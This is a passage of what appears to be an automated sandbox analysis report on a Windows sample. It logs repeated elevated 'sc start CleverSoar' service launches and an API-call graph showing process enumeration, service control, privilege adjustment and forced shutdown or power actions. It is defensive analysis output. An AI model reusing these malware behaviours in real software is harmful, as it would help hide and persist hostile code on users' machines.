                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff623250000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:101
                          Start time:07:11:48
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6cb0c0000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:102
                          Start time:07:11:48
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:103
                          Start time:07:11:49
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff623250000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:104
                          Start time:07:11:49
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6cb0c0000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:105
                          Start time:07:11:49
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:106
                          Start time:07:11:49
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff623250000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Disassembly

                          Reset < >

                            Execution Graph

                            Execution Coverage:1.6%
                            Dynamic/Decrypted Code Coverage:0%
                            Signature Coverage:15%
                            Total number of Nodes:831
                            Total number of Limit Nodes:10
                            execution_graph 100283 6bf34b53 100441 6c0b6fb3 100283->100441 100285 6bf34b5c _Yarn 100455 6c0ab430 100285->100455 100287 6bf5639e 100551 6c0c06a0 18 API calls 2 library calls 100287->100551 100289 6bf34cff 100290 6bf35164 CreateFileA CloseHandle 100295 6bf351ec 100290->100295 100291 6bf34bae std::ios_base::_Ios_base_dtor 100291->100287 100291->100289 100291->100290 100292 6bf4245a _Yarn _strlen 100291->100292 100292->100287 100294 6c0ab430 FindFirstFileA 100292->100294 100310 6bf42a83 std::ios_base::_Ios_base_dtor 100294->100310 100459 6c0b5690 OpenSCManagerA 100295->100459 100297 6bf3fc00 100544 6c0b57b0 CreateToolhelp32Snapshot 100297->100544 100299 6c0b6fb3 IsProcessorFeaturePresent RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 100336 6bf35478 std::ios_base::_Ios_base_dtor _Yarn _strlen 100299->100336 100302 6c0ab430 FindFirstFileA 100302->100336 100303 6bf437d0 Sleep 100347 6bf437e0 std::ios_base::_Ios_base_dtor _Yarn _strlen 100303->100347 100304 6bf563b2 100552 6bf315e0 18 API calls std::ios_base::_Ios_base_dtor 100304->100552 100305 6c0b57b0 4 API calls 100323 6bf4053a 100305->100323 100307 6c0b57b0 4 API calls 100328 6bf412e2 100307->100328 100308 6bf3ffe3 100308->100305 100315 6bf40abc 100308->100315 100309 6bf564f8 100310->100287 100463 6c0a0900 100310->100463 100311 6bf56ba0 104 API calls 100311->100336 100312 6bf56e60 32 API calls 100312->100336 100314 6c0b57b0 4 API calls 100314->100315 100315->100292 100315->100307 100317 6c0b57b0 4 API calls 100333 6bf41dd9 100317->100333 100318 6bf4211c 100318->100292 100319 6bf4241a 100318->100319 100322 6c0a0900 11 API calls 100319->100322 100320 6c0ab430 FindFirstFileA 100320->100347 100325 6bf4244d 100322->100325 100323->100314 100323->100315 100324 6bf36722 100520 6c0b1df0 25 API calls 4 library calls 100324->100520 100550 6c0b62d0 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 100325->100550 100327 6bf42452 Sleep 100327->100292 100328->100317 100328->100318 100339 6bf416ac 100328->100339 100329 6bf36162 100330 6bf3740b 100521 6c0b5560 CreateProcessA 100330->100521 100332 6c0b57b0 4 API calls 100332->100318 100333->100318 100333->100332 100336->100287 100336->100297 100336->100299 100336->100302 100336->100311 100336->100312 100336->100324 100336->100329 100501 6bf57090 100336->100501 100514 6bf7e010 100336->100514 100337 6bf57090 77 API calls 100337->100347 100338 6bf7e010 67 API calls 100338->100347 100340 6bf3775a _strlen 100340->100287 100341 6bf37b92 100340->100341 100342 6bf37ba9 100340->100342 100345 6bf37b43 _Yarn 100340->100345 100343 6c0b6fb3 std::_Facet_Register 4 API calls 100341->100343 100344 6c0b6fb3 std::_Facet_Register 4 API calls 100342->100344 100343->100345 100344->100345 100346 6c0ab430 FindFirstFileA 100345->100346 100356 6bf37be7 std::ios_base::_Ios_base_dtor 100346->100356 100347->100287 100347->100320 100347->100337 100347->100338 100472 6bf56ba0 100347->100472 100491 6bf56e60 100347->100491 100348 6c0b5560 4 API calls 100359 6bf38a07 100348->100359 100349 6bf39d68 100352 6c0b6fb3 std::_Facet_Register 4 API calls 100349->100352 100350 6bf39d7f 100353 6c0b6fb3 std::_Facet_Register 4 API calls 100350->100353 100351 6bf3962c _strlen 100351->100287 100351->100349 100351->100350 100354 6bf39d18 _Yarn 100351->100354 100352->100354 100353->100354 100355 6c0ab430 FindFirstFileA 100354->100355 100362 6bf39dbd std::ios_base::_Ios_base_dtor 100355->100362 100356->100287 100356->100348 100356->100351 100357 6bf38387 100356->100357 100358 6c0b5560 4 API calls 100367 6bf39120 100358->100367 100359->100358 100360 6c0b5560 4 API calls 100377 6bf3a215 _strlen 100360->100377 100361 6c0b5560 4 API calls 100363 6bf39624 100361->100363 100362->100287 100362->100360 100370 6bf3e8b5 std::ios_base::_Ios_base_dtor _Yarn _strlen 100362->100370 100525 6c0b62d0 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 100363->100525 100364 6c0b6fb3 IsProcessorFeaturePresent RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 100364->100370 100366 6c0ab430 FindFirstFileA 100366->100370 100367->100361 100368 6bf3ed02 Sleep 100389 6bf3e8c1 100368->100389 100369 6bf3f7b1 100543 6c0b62d0 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 100369->100543 100370->100287 100370->100364 100370->100366 100370->100368 100370->100369 100372 6bf3e8dd GetCurrentProcess TerminateProcess 100372->100370 100373 6bf3a9a4 100375 6c0b6fb3 std::_Facet_Register 4 API calls 100373->100375 100374 6bf3a9bb 100376 6c0b6fb3 std::_Facet_Register 4 API calls 100374->100376 100384 6bf3a953 _Yarn _strlen 100375->100384 100376->100384 100377->100287 100377->100373 100377->100374 100377->100384 100378 6c0b5560 4 API calls 100378->100389 100379 6bf3fbb8 100381 6bf3fbe8 ExitWindowsEx Sleep 100379->100381 100380 6bf3f7c0 100380->100379 100381->100297 100382 6bf3aff0 100385 6c0b6fb3 std::_Facet_Register 4 API calls 100382->100385 100383 6bf3b009 100386 6c0b6fb3 std::_Facet_Register 4 API calls 100383->100386 100384->100304 100384->100382 100384->100383 100387 6bf3afa0 _Yarn 100384->100387 100385->100387 100386->100387 100526 6c0b5ed0 100387->100526 100389->100370 100389->100372 100389->100378 100390 6bf3b059 std::ios_base::_Ios_base_dtor _strlen 100390->100287 100391 6bf3b443 100390->100391 100392 6bf3b42c 100390->100392 100395 6bf3b3da _Yarn _strlen 100390->100395 100394 6c0b6fb3 std::_Facet_Register 4 API calls 100391->100394 100393 6c0b6fb3 std::_Facet_Register 4 API calls 100392->100393 100393->100395 100394->100395 100395->100304 100396 6bf3b7b7 100395->100396 100397 6bf3b79e 100395->100397 100400 6bf3b751 _Yarn 100395->100400 100398 6c0b6fb3 std::_Facet_Register 4 API calls 100396->100398 100399 6c0b6fb3 std::_Facet_Register 4 API calls 100397->100399 100398->100400 100399->100400 100401 6c0b5ed0 104 API calls 100400->100401 100402 6bf3b804 std::ios_base::_Ios_base_dtor _strlen 100401->100402 100402->100287 100403 6bf3bc26 100402->100403 100404 6bf3bc0f 100402->100404 100407 6bf3bbbd _Yarn _strlen 100402->100407 100406 6c0b6fb3 std::_Facet_Register 4 API calls 100403->100406 100405 6c0b6fb3 std::_Facet_Register 4 API calls 100404->100405 100405->100407 100406->100407 100407->100304 100408 6bf3c075 100407->100408 100409 6bf3c08e 100407->100409 100412 6bf3c028 _Yarn 100407->100412 100410 6c0b6fb3 std::_Facet_Register 4 API calls 100408->100410 100411 6c0b6fb3 std::_Facet_Register 4 API calls 100409->100411 100410->100412 100411->100412 100413 6c0b5ed0 104 API calls 100412->100413 100418 6bf3c0db std::ios_base::_Ios_base_dtor _strlen 100413->100418 100414 6bf3c7a5 100416 6c0b6fb3 std::_Facet_Register 4 API calls 100414->100416 100415 6bf3c7bc 100417 6c0b6fb3 std::_Facet_Register 4 API calls 100415->100417 100425 6bf3c753 _Yarn _strlen 100416->100425 100417->100425 100418->100287 100418->100414 100418->100415 100418->100425 100419 6bf3d406 100422 6c0b6fb3 std::_Facet_Register 4 API calls 100419->100422 100420 6bf3d3ed 100421 6c0b6fb3 std::_Facet_Register 4 API calls 100420->100421 100423 6bf3d39a _Yarn 100421->100423 100422->100423 100424 6c0b5ed0 104 API calls 100423->100424 100426 6bf3d458 std::ios_base::_Ios_base_dtor _strlen 100424->100426 100425->100304 100425->100419 100425->100420 100425->100423 100431 6bf3cb2f 100425->100431 100426->100287 100427 6bf3d8a4 100426->100427 100428 6bf3d8bb 100426->100428 100432 6bf3d852 _Yarn _strlen 100426->100432 100429 6c0b6fb3 std::_Facet_Register 4 API calls 100427->100429 100430 6c0b6fb3 std::_Facet_Register 4 API calls 100428->100430 100429->100432 100430->100432 100432->100304 100433 6bf3dcb6 100432->100433 100434 6bf3dccf 100432->100434 100437 6bf3dc69 _Yarn 100432->100437 100435 6c0b6fb3 std::_Facet_Register 4 API calls 100433->100435 100436 6c0b6fb3 std::_Facet_Register 4 API calls 100434->100436 100435->100437 100436->100437 100438 6c0b5ed0 104 API calls 100437->100438 100440 6bf3dd1c std::ios_base::_Ios_base_dtor 100438->100440 100439 6c0b5560 4 API calls 100439->100370 100440->100287 100440->100439 100442 6c0b6fb8 100441->100442 100443 6c0b6fd2 100442->100443 100446 6c0b6fd4 std::_Facet_Register 100442->100446 100553 6c0bf584 EnterCriticalSection LeaveCriticalSection std::_Facet_Register 100442->100553 100443->100285 100445 6c0b7e33 std::_Facet_Register 100557 6c0b98e9 RaiseException 100445->100557 100446->100445 100554 6c0b98e9 RaiseException 100446->100554 100448 6c0b862c IsProcessorFeaturePresent 100454 6c0b8651 100448->100454 100450 6c0b7df3 100555 6c0b98e9 RaiseException 100450->100555 100452 6c0b7e13 std::invalid_argument::invalid_argument 100556 6c0b98e9 RaiseException 100452->100556 100454->100285 100456 6c0ab446 FindFirstFileA 100455->100456 100457 6c0ab444 100455->100457 100458 6c0ab480 100456->100458 100457->100456 100458->100291 100460 6c0b56c6 100459->100460 100461 6c0b5758 OpenServiceA 100460->100461 100462 6c0b579f 100460->100462 100461->100460 100462->100336 100468 6c0a0913 _Yarn __wsopen_s std::locale::_Setgloballocale _strlen 100463->100468 100464 6c0a367e CloseHandle 100464->100468 100465 6c0a44cf CloseHandle 100465->100468 100466 6c0a2a8b CloseHandle 100466->100468 100467 6bf437cb 100471 6c0b62d0 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 100467->100471 100468->100464 100468->100465 100468->100466 100468->100467 100469 6c08c750 WriteFile WriteFile WriteFile ReadFile 100468->100469 100558 6c08bca0 100468->100558 100469->100468 100471->100303 100473 6bf56bd5 100472->100473 100569 6bf82020 100473->100569 100475 6bf56c68 100476 6c0b6fb3 std::_Facet_Register 4 API calls 100475->100476 100477 6bf56ca0 100476->100477 100586 6c0b7897 100477->100586 100479 6bf56cb4 100598 6bf81d90 100479->100598 100482 6bf56d8e 100482->100347 100484 6bf56dc8 100606 6bf826e0 24 API calls 4 library calls 100484->100606 100486 6bf56dda 100607 6c0b98e9 RaiseException 100486->100607 100488 6bf56def 100489 6bf7e010 67 API calls 100488->100489 100490 6bf56e0f 100489->100490 100490->100347 100492 6bf56e9f 100491->100492 100495 6bf56eb3 100492->100495 101003 6bf83560 32 API calls std::_Xinvalid_argument 100492->101003 100497 6bf56f5b 100495->100497 101005 6bf82250 30 API calls 100495->101005 101006 6bf826e0 24 API calls 4 library calls 100495->101006 101007 6c0b98e9 RaiseException 100495->101007 100498 6bf56f6e 100497->100498 101004 6bf837e0 32 API calls std::_Xinvalid_argument 100497->101004 100498->100347 100502 6bf5709e 100501->100502 100504 6bf570d1 100501->100504 101008 6bf801f0 100502->101008 100503 6bf57183 100503->100336 100504->100503 101012 6bf82250 30 API calls 100504->101012 100508 6c0c1088 67 API calls 100508->100504 100509 6bf571ae 101013 6bf82340 24 API calls 100509->101013 100511 6bf571be 101014 6c0b98e9 RaiseException 100511->101014 100513 6bf571c9 100515 6bf7e04b 100514->100515 100516 6bf7e0a3 100515->100516 100517 6bf801f0 64 API calls 100515->100517 100516->100336 100518 6bf7e098 100517->100518 100519 6c0c1088 67 API calls 100518->100519 100519->100516 100520->100330 100522 6c0b563a 100521->100522 100523 6c0b55f0 WaitForSingleObject CloseHandle CloseHandle 100522->100523 100524 6c0b5653 100522->100524 100523->100522 100524->100340 100525->100351 100527 6c0b5f27 100526->100527 101060 6c0b6560 100527->101060 100529 6c0b5f38 100530 6bf56ba0 104 API calls 100529->100530 100531 6c0b5f5c 100530->100531 100536 6c0b5fc4 100531->100536 100542 6c0b5fd7 100531->100542 101079 6c0b68b0 100531->101079 101087 6bf92370 100531->101087 100532 6bf7e010 67 API calls 100533 6c0b600f std::ios_base::_Ios_base_dtor 100532->100533 100535 6bf7e010 67 API calls 100533->100535 100538 6c0b6052 std::ios_base::_Ios_base_dtor 100535->100538 101097 6c0b6100 100536->101097 100538->100390 100540 6c0b5fcc 100541 6bf57090 77 API calls 100540->100541 100541->100542 100542->100532 100543->100380 100545 6c0b5810 std::locale::_Setgloballocale 100544->100545 100546 6c0b57e7 CloseHandle 100545->100546 100547 6c0b5890 Process32NextW 100545->100547 100548 6c0b5921 100545->100548 100549 6c0b58b5 Process32FirstW 100545->100549 100546->100545 100547->100545 100548->100308 100549->100545 100550->100327 100552->100309 100553->100442 100554->100450 100555->100452 100556->100445 100557->100448 100559 6c08bcb3 _Yarn __wsopen_s std::locale::_Setgloballocale 100558->100559 100560 6c08c6f0 100559->100560 100561 6c08c25d CreateFileA 100559->100561 100563 6c08afa0 100559->100563 100560->100468 100561->100559 100566 6c08afb3 __wsopen_s std::locale::_Setgloballocale 100563->100566 100564 6c08b959 WriteFile 100564->100566 100565 6c08b9ad WriteFile 100565->100566 100566->100564 100566->100565 100567 6c08bc88 100566->100567 100568 6c08b105 ReadFile 100566->100568 100567->100559 100568->100566 100570 6c0b6fb3 std::_Facet_Register 4 API calls 100569->100570 100571 6bf8207e 100570->100571 100572 6c0b7897 43 API calls 100571->100572 100573 6bf82092 100572->100573 100608 6bf82f60 42 API calls 4 library calls 100573->100608 100575 6bf820c8 100576 6bf8210d 100575->100576 100577 6bf82136 100575->100577 100578 6bf82120 100576->100578 100609 6c0b74fe 9 API calls 2 library calls 100576->100609 100610 6bf82250 30 API calls 100577->100610 100578->100475 100581 6bf8215b 100611 6bf82340 24 API calls 100581->100611 100583 6bf82171 100612 6c0b98e9 RaiseException 100583->100612 100585 6bf8217c 100585->100475 100587 6c0b78a3 __EH_prolog3 100586->100587 100613 6c0b7425 100587->100613 100592 6c0b78c1 100627 6c0b792a 39 API calls std::locale::_Setgloballocale 100592->100627 100593 6c0b791c 100593->100479 100595 6c0b78c9 100628 6c0b7721 HeapFree GetLastError _Yarn ___std_exception_destroy 100595->100628 100597 6c0b78df 100619 6c0b7456 100597->100619 100599 6bf81ddc 100598->100599 100600 6bf56d5d 100598->100600 100633 6c0b79b7 100599->100633 100600->100482 100605 6bf82250 30 API calls 100600->100605 100604 6bf81e82 100605->100484 100606->100486 100607->100488 100608->100575 100609->100578 100610->100581 100611->100583 100612->100585 100614 6c0b743b 100613->100614 100615 6c0b7434 100613->100615 100617 6c0b7439 100614->100617 100630 6c0b8afb EnterCriticalSection 100614->100630 100629 6c0c093d 6 API calls std::_Lockit::_Lockit 100615->100629 100617->100597 100626 6c0b77a0 6 API calls 2 library calls 100617->100626 100620 6c0c094b 100619->100620 100621 6c0b7460 100619->100621 100632 6c0c0926 LeaveCriticalSection 100620->100632 100625 6c0b7473 100621->100625 100631 6c0b8b09 LeaveCriticalSection 100621->100631 100624 6c0c0952 100624->100593 100625->100593 100626->100592 100627->100595 100628->100597 100629->100617 100630->100617 100631->100625 100632->100624 100635 6c0b79c0 100633->100635 100637 6bf81dea 100635->100637 100642 6c0c02ba 100635->100642 100636 6c0b7a0c 100636->100637 100653 6c0bffc8 65 API calls 100636->100653 100637->100600 100641 6c0bcad3 18 API calls __cftoe 100637->100641 100639 6c0b7a27 100639->100637 100654 6c0c1088 100639->100654 100641->100604 100643 6c0c02c5 __wsopen_s 100642->100643 100644 6c0c02d8 100643->100644 100645 6c0c02f8 100643->100645 100679 6c0c0690 18 API calls __cftoe 100644->100679 100649 6c0c02e8 100645->100649 100665 6c0cb37c 100645->100665 100649->100636 100653->100639 100655 6c0c1094 __wsopen_s 100654->100655 100656 6c0c10b3 100655->100656 100657 6c0c109e 100655->100657 100663 6c0c10ae 100656->100663 100860 6c0bcb19 EnterCriticalSection 100656->100860 100875 6c0c0690 18 API calls __cftoe 100657->100875 100660 6c0c10d0 100861 6c0c110c 100660->100861 100662 6c0c10db 100876 6c0c1102 LeaveCriticalSection 100662->100876 100663->100637 100666 6c0cb388 __wsopen_s 100665->100666 100681 6c0c090f EnterCriticalSection 100666->100681 100668 6c0cb396 100682 6c0cb420 100668->100682 100673 6c0cb4e2 100674 6c0cb601 100673->100674 100706 6c0cb684 100674->100706 100677 6c0c033c 100680 6c0c0365 LeaveCriticalSection 100677->100680 100679->100649 100680->100649 100681->100668 100689 6c0cb443 100682->100689 100683 6c0cb3a3 100696 6c0cb3dc 100683->100696 100684 6c0cb49b 100701 6c0c7755 EnterCriticalSection LeaveCriticalSection HeapAlloc __Getctype std::_Facet_Register 100684->100701 100686 6c0cb4a4 100702 6c0c4d2b HeapFree GetLastError __dosmaperr 100686->100702 100689->100683 100689->100684 100699 6c0bcb19 EnterCriticalSection 100689->100699 100700 6c0bcb2d LeaveCriticalSection 100689->100700 100690 6c0cb4ad 100690->100683 100703 6c0c718f 6 API calls std::_Lockit::_Lockit 100690->100703 100692 6c0cb4cc 100704 6c0bcb19 EnterCriticalSection 100692->100704 100695 6c0cb4df 100695->100683 100705 6c0c0926 LeaveCriticalSection 100696->100705 100698 6c0c0313 100698->100649 100698->100673 100699->100689 100700->100689 100701->100686 100702->100690 100703->100692 100704->100695 100705->100698 100707 6c0cb6a3 100706->100707 100708 6c0cb6b6 100707->100708 100712 6c0cb6cb 100707->100712 100722 6c0c0690 18 API calls __cftoe 100708->100722 100710 6c0cb617 100710->100677 100719 6c0d454e 100710->100719 100712->100712 100715 6c0cb7eb 100712->100715 100723 6c0d4418 37 API calls __cftoe 100712->100723 100714 6c0cb83b 100714->100715 100724 6c0d4418 37 API calls __cftoe 100714->100724 100715->100710 100726 6c0c0690 18 API calls __cftoe 100715->100726 100717 6c0cb859 100717->100715 100725 6c0d4418 37 API calls __cftoe 100717->100725 100727 6c0d4906 100719->100727 100722->100710 100723->100714 100724->100717 100725->100715 100726->100710 100729 6c0d4912 __wsopen_s 100727->100729 100728 6c0d4919 100745 6c0c0690 18 API calls __cftoe 100728->100745 100729->100728 100730 6c0d4944 100729->100730 100736 6c0d456e 100730->100736 100735 6c0d4569 100735->100677 100747 6c0c0c3b 100736->100747 100741 6c0d45a4 100744 6c0d45d6 100741->100744 100787 6c0c4d2b HeapFree GetLastError __dosmaperr 100741->100787 100746 6c0d499b LeaveCriticalSection __wsopen_s 100744->100746 100745->100735 100746->100735 100788 6c0bc25b 100747->100788 100750 6c0c0c5f 100752 6c0bc366 100750->100752 100797 6c0bc3be 100752->100797 100754 6c0bc37e 100754->100741 100755 6c0d45dc 100754->100755 100812 6c0d4a5c 100755->100812 100761 6c0d460e __dosmaperr 100761->100741 100762 6c0d4702 GetFileType 100763 6c0d470d GetLastError 100762->100763 100764 6c0d4754 100762->100764 100841 6c0bff62 __dosmaperr 100763->100841 100842 6c0d1d20 SetStdHandle __dosmaperr __wsopen_s 100764->100842 100765 6c0d46d7 GetLastError 100765->100761 100766 6c0d4685 100766->100762 100766->100765 100840 6c0d49c7 CreateFileW 100766->100840 100769 6c0d471b CloseHandle 100769->100761 100784 6c0d4744 100769->100784 100771 6c0d46ca 100771->100762 100771->100765 100772 6c0d4775 100773 6c0d47c1 100772->100773 100843 6c0d4bd6 70 API calls 2 library calls 100772->100843 100777 6c0d47c8 100773->100777 100857 6c0d4c80 70 API calls 2 library calls 100773->100857 100776 6c0d47f6 100776->100777 100778 6c0d4804 100776->100778 100844 6c0cbe95 100777->100844 100778->100761 100780 6c0d4880 CloseHandle 100778->100780 100858 6c0d49c7 CreateFileW 100780->100858 100782 6c0d48ab 100783 6c0d48b5 GetLastError 100782->100783 100782->100784 100785 6c0d48c1 __dosmaperr 100783->100785 100784->100761 100859 6c0d1c8f SetStdHandle __dosmaperr __wsopen_s 100785->100859 100787->100744 100789 6c0bc27b 100788->100789 100790 6c0bc272 100788->100790 100789->100790 100791 6c0c4f22 __Getctype 37 API calls 100789->100791 100790->100750 100796 6c0c6f45 5 API calls std::_Lockit::_Lockit 100790->100796 100792 6c0bc29b 100791->100792 100793 6c0c5498 __Getctype 37 API calls 100792->100793 100794 6c0bc2b1 100793->100794 100795 6c0c54c5 __cftoe 37 API calls 100794->100795 100795->100790 100796->100750 100798 6c0bc3cc 100797->100798 100799 6c0bc3e6 100797->100799 100802 6c0bc34c __wsopen_s HeapFree GetLastError 100798->100802 100800 6c0bc3ed 100799->100800 100801 6c0bc40c 100799->100801 100804 6c0bc3d6 __dosmaperr 100800->100804 100805 6c0bc30d __wsopen_s HeapFree GetLastError 100800->100805 100803 6c0c4db3 __fassign MultiByteToWideChar 100801->100803 100802->100804 100808 6c0bc41b 100803->100808 100804->100754 100805->100804 100806 6c0bc422 GetLastError 100806->100804 100807 6c0bc448 100807->100804 100810 6c0c4db3 __fassign MultiByteToWideChar 100807->100810 100808->100806 100808->100807 100809 6c0bc30d __wsopen_s HeapFree GetLastError 100808->100809 100809->100807 100811 6c0bc45f 100810->100811 100811->100804 100811->100806 100813 6c0d4a97 100812->100813 100815 6c0d4a7d 100812->100815 100814 6c0d49ec __wsopen_s 18 API calls 100813->100814 100819 6c0d4acf 100814->100819 100815->100813 100816 6c0c0690 __cftoe 18 API calls 100815->100816 100816->100813 100817 6c0d4afe 100818 6c0d5e81 __wsopen_s 18 API calls 100817->100818 100825 6c0d45f9 100817->100825 100820 6c0d4b4c 100818->100820 100819->100817 100822 6c0c0690 __cftoe 18 API calls 100819->100822 100821 6c0d4bc9 100820->100821 100820->100825 100823 6c0c06bd __Getctype 11 API calls 100821->100823 100822->100817 100824 6c0d4bd5 100823->100824 100825->100761 100826 6c0d1b7c 100825->100826 100827 6c0d1b88 __wsopen_s 100826->100827 100828 6c0c090f std::_Lockit::_Lockit EnterCriticalSection 100827->100828 100830 6c0d1b8f 100828->100830 100829 6c0d1bd6 100832 6c0d1c86 __wsopen_s LeaveCriticalSection 100829->100832 100830->100829 100831 6c0d1bb4 100830->100831 100836 6c0d1c23 EnterCriticalSection 100830->100836 100833 6c0d1db2 __wsopen_s 11 API calls 100831->100833 100834 6c0d1bf6 100832->100834 100835 6c0d1bb9 100833->100835 100834->100761 100839 6c0d49c7 CreateFileW 100834->100839 100835->100829 100837 6c0d1f00 __wsopen_s EnterCriticalSection 100835->100837 100836->100829 100838 6c0d1c30 LeaveCriticalSection 100836->100838 100837->100829 100838->100830 100839->100766 100840->100771 100841->100769 100842->100772 100843->100773 100845 6c0d1b12 __wsopen_s 18 API calls 100844->100845 100848 6c0cbea5 100845->100848 100846 6c0cbeab 100847 6c0d1c8f __wsopen_s SetStdHandle 100846->100847 100853 6c0cbf03 __dosmaperr 100847->100853 100848->100846 100849 6c0d1b12 __wsopen_s 18 API calls 100848->100849 100856 6c0cbedd 100848->100856 100851 6c0cbed4 100849->100851 100850 6c0d1b12 __wsopen_s 18 API calls 100852 6c0cbee9 CloseHandle 100850->100852 100854 6c0d1b12 __wsopen_s 18 API calls 100851->100854 100852->100846 100855 6c0cbef5 GetLastError 100852->100855 100853->100761 100854->100856 100855->100846 100856->100846 100856->100850 100857->100776 100858->100782 100859->100784 100860->100660 100862 6c0c112e 100861->100862 100863 6c0c1119 100861->100863 100867 6c0c1129 100862->100867 100877 6c0c1229 100862->100877 100899 6c0c0690 18 API calls __cftoe 100863->100899 100867->100662 100871 6c0c1151 100892 6c0cbe08 100871->100892 100873 6c0c1157 100873->100867 100900 6c0c4d2b HeapFree GetLastError __dosmaperr 100873->100900 100875->100663 100876->100663 100878 6c0c1143 100877->100878 100879 6c0c1241 100877->100879 100883 6c0c8cae 100878->100883 100879->100878 100880 6c0ca1d0 18 API calls 100879->100880 100881 6c0c125f 100880->100881 100901 6c0cc0dc 100881->100901 100884 6c0c114b 100883->100884 100885 6c0c8cc5 100883->100885 100887 6c0ca1d0 100884->100887 100885->100884 100990 6c0c4d2b HeapFree GetLastError __dosmaperr 100885->100990 100888 6c0ca1dc 100887->100888 100889 6c0ca1f1 100887->100889 100991 6c0c0690 18 API calls __cftoe 100888->100991 100889->100871 100891 6c0ca1ec 100891->100871 100893 6c0cbe2e 100892->100893 100895 6c0cbe19 __dosmaperr 100892->100895 100894 6c0cbe77 __dosmaperr 100893->100894 100896 6c0cbe55 100893->100896 101000 6c0c0690 18 API calls __cftoe 100894->101000 100895->100873 100992 6c0cbf31 100896->100992 100899->100867 100900->100867 100902 6c0cc0e8 __wsopen_s 100901->100902 100903 6c0cc13a 100902->100903 100905 6c0cc1a3 __dosmaperr 100902->100905 100908 6c0cc0f0 __dosmaperr 100902->100908 100912 6c0d1f00 EnterCriticalSection 100903->100912 100942 6c0c0690 18 API calls __cftoe 100905->100942 100906 6c0cc140 100910 6c0cc15c __dosmaperr 100906->100910 100913 6c0cc1ce 100906->100913 100908->100878 100941 6c0cc19b LeaveCriticalSection __wsopen_s 100910->100941 100912->100906 100914 6c0cc1f0 100913->100914 100940 6c0cc20c __dosmaperr 100913->100940 100915 6c0cc244 100914->100915 100917 6c0cc1f4 __dosmaperr 100914->100917 100916 6c0cc257 100915->100916 100951 6c0cb1d9 20 API calls __wsopen_s 100915->100951 100943 6c0cc3b0 100916->100943 100950 6c0c0690 18 API calls __cftoe 100917->100950 100922 6c0cc2ac 100924 6c0cc305 WriteFile 100922->100924 100925 6c0cc2c0 100922->100925 100923 6c0cc26d 100926 6c0cc296 100923->100926 100927 6c0cc271 100923->100927 100928 6c0cc329 GetLastError 100924->100928 100924->100940 100930 6c0cc2cb 100925->100930 100931 6c0cc2f5 100925->100931 100953 6c0cc421 43 API calls 5 library calls 100926->100953 100927->100940 100952 6c0cc7cb 6 API calls __wsopen_s 100927->100952 100928->100940 100934 6c0cc2e5 100930->100934 100935 6c0cc2d0 100930->100935 100956 6c0cc833 7 API calls 2 library calls 100931->100956 100955 6c0cc9f7 8 API calls 3 library calls 100934->100955 100936 6c0cc2d5 100935->100936 100935->100940 100954 6c0cc90e 7 API calls 2 library calls 100936->100954 100939 6c0cc2e3 100939->100940 100940->100910 100941->100908 100942->100908 100957 6c0d1f55 100943->100957 100945 6c0cc3c1 100946 6c0cc268 100945->100946 100962 6c0c4f22 GetLastError 100945->100962 100946->100922 100946->100923 100949 6c0cc3fe GetConsoleMode 100949->100946 100950->100940 100951->100916 100952->100940 100953->100940 100954->100939 100955->100939 100956->100939 100958 6c0d1f62 100957->100958 100960 6c0d1f6f 100957->100960 100958->100945 100959 6c0d1f7b 100959->100945 100960->100959 100961 6c0c0690 __cftoe 18 API calls 100960->100961 100961->100958 100963 6c0c4f39 100962->100963 100964 6c0c4f3f 100962->100964 100966 6c0c7093 __Getctype 6 API calls 100963->100966 100965 6c0c70d2 